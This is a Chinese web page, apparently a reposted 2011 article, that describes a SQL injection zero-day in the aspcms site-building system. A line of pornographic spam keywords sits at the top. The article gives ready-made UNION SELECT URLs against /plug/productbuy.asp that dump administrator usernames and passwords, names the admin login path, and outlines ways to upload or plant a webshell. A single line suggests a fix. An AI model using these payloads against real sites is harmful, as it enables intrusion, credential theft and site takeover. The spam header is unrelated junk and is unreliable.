欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

aspcms企業(yè)建站系統(tǒng)0day漏洞介紹

  發(fā)布時間:2011-09-26 01:04:08   作者:佚名   我要評論
aspcms企業(yè)建站系統(tǒng)0day 2.0以上通殺2011-08-14 19:21aspcms開發(fā)的全新內核的開源企業(yè)建站系統(tǒng),能夠勝任企業(yè)多種建站需求,并且支持模版自定義、支持擴展插件等等,能夠在短時間內完成企業(yè)建站。
漏洞出現(xiàn)在
/plug/productbuy.asp
對接收的參數(shù)id沒有進行過濾而導致的注入漏洞
注入后的頁面有跳轉,所以要快,建議用快捷鍵復制
爆用戶名
/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
這是爆ID=1的賬戶名,如果發(fā)現(xiàn)權限不夠可以往后試2,3,4...........

爆密碼
/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

后臺登錄地址:/admin/login.asp

后臺拿shell
1、直接上傳.asp;x
2、系統(tǒng)配置信息
3、模版管理新建1.asp模板,內容寫馬的內容.

修復方法: id用cint(request("id"))

相關文章

最新評論